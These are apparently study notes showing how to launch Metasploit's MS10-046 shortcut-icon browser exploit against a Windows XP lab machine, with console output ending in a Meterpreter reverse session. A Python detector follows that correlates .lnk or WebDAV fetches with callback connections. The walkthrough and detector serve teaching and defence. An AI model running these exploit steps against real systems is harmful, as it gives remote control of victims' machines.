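!!! These notes are for study and discussion only; do not use them for any other purpose !!!
Metasploit ships with many browser attack modules; these notes record the simplest way to use one.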
root@kali:~# msfconsole
......
......
msf > search browser    # search for available modules

Matching Modules
================

   Name  Disclosure Date  Rank  Description
   ----  ---------------  ----  -----------
......
......
msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader    # use a relatively recent exploit module here
msf exploit(ms10_046_shortcut_icon_dllloader) > show options

Module options (exploit/windows/browser/ms10_046_shortcut_icon_dllloader):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  80               yes       The daemon port to listen on (do not change)
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   UNCHOST                   no        The host portion of the UNC path to provide to clients (ex: 1.2.3.4).
   URIPATH  /                yes       The URI to use (do not change).

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(ms10_046_shortcut_icon_dllloader) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.19.128:4444
msf exploit(ms10_046_shortcut_icon_dllloader) >
[*] Send vulnerable clients to \\192.168.19.128\qKJqXZCIry\.
[*] Or, get clients to save and render the icon of http://<your host>/<anything>.lnk
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.19.128:80/
# When someone visits http://192.168.19.128:80/ in a browser, the vulnerability is triggered and a Meterpreter session is started, as follows:
......
......
[*] Meterpreter session 1 opened (192.168.19.128:4444 -> 192.168.19.129:1106) at 2014-06-04 20:56:32 +0800
msf exploit(ms10_046_shortcut_icon_dllloader) > sessions

Active sessions
===============

  Id  Type                   Information                                Connection
  --  ----                   -----------                                ----------
  1   meterpreter x86/win32  WINXP-PRO-VM\Administrator @ WINXP-PRO-VM  192.168.19.128:4444 -> 192.168.19.129:1106 (192.168.19.129)

msf exploit(ms10_046_shortcut_icon_dllloader) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WINXP-PRO-VM
OS              : Windows XP (Build 2600, Service Pack 2).
Architecture    : x86
System Language : zh_CN
Meterpreter     : x86/win32
meterpreter >
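The same session seen from the defender's side, as an added example that is not part of the original notes: a client browses a WebDAV share or fetches a .lnk over HTTP, then opens a new connection back to the same server (port 4444 above). The log layout, the file name a.lnk, the 60-second window and the user-agent strings are constructed assumptions; the addresses, share name and timestamp come from the session above.

```python
import re
from datetime import datetime, timedelta

# Constructed sample events (not real logs). Addresses, share name and the
# 4444 callback mirror the session above; the log layout is an assumption.
SAMPLE = """\
2014-06-04 20:56:20 HTTP 192.168.19.129 192.168.19.128:80 GET / "Mozilla/4.0 (compatible; MSIE 6.0)"
2014-06-04 20:56:25 HTTP 192.168.19.129 192.168.19.128:80 PROPFIND /qKJqXZCIry "Microsoft-WebDAV-MiniRedir/5.1.2600"
2014-06-04 20:56:28 HTTP 192.168.19.129 192.168.19.128:80 GET /qKJqXZCIry/a.lnk "Microsoft-WebDAV-MiniRedir/5.1.2600"
2014-06-04 20:56:32 CONN 192.168.19.129 192.168.19.128:4444
2014-06-04 20:57:00 HTTP 192.168.19.130 192.168.19.10:80 GET /index.html "Mozilla/4.0 (compatible; MSIE 6.0)"
2014-06-04 21:30:00 CONN 192.168.19.130 192.168.19.10:4444
"""

LINE = re.compile(
    r'(?P<ts>\S+ \S+) (?P<kind>HTTP|CONN) (?P<src>\S+) (?P<dst>[^:\s]+):(?P<port>\d+)'
    r'(?: (?P<method>\S+) (?P<path>\S+) "(?P<ua>[^"]*)")?$')

def parse(text):
    """Yield one dict per well-formed log line; malformed lines are skipped."""
    for line in text.splitlines():
        m = LINE.match(line.strip())
        if m:
            e = m.groupdict()
            e["ts"] = datetime.strptime(e["ts"], "%Y-%m-%d %H:%M:%S")
            e["port"] = int(e["port"])
            yield e

def is_lnk_delivery(e):
    """True for a shortcut fetched over HTTP or WebDAV browsing by the Windows redirector."""
    if e["kind"] != "HTTP":
        return False
    return (e["path"].lower().split("?")[0].endswith(".lnk")
            or e["method"] == "PROPFIND"
            or "webdav-miniredir" in e["ua"].lower())

def correlate(events, window=timedelta(seconds=60)):
    """Alert when a client that just touched a .lnk/WebDAV resource opens a
    new connection to the same server within `window`."""
    seen, alerts = {}, []
    for e in sorted(events, key=lambda e: e["ts"]):
        key = (e["src"], e["dst"])
        if is_lnk_delivery(e):
            seen[key] = e["ts"]          # remember the latest delivery indicator
        elif e["kind"] == "CONN" and key in seen and e["ts"] - seen[key] <= window:
            alerts.append({"client": e["src"], "server": e["dst"], "callback_port": e["port"],
                           "delay_s": int((e["ts"] - seen[key]).total_seconds())})
    return alerts

if __name__ == "__main__":
    print(correlate(parse(SAMPLE)))
```

Either indicator alone is noisy on a network that legitimately uses WebDAV; the correlation with a follow-up connection to the same host is what narrows it down.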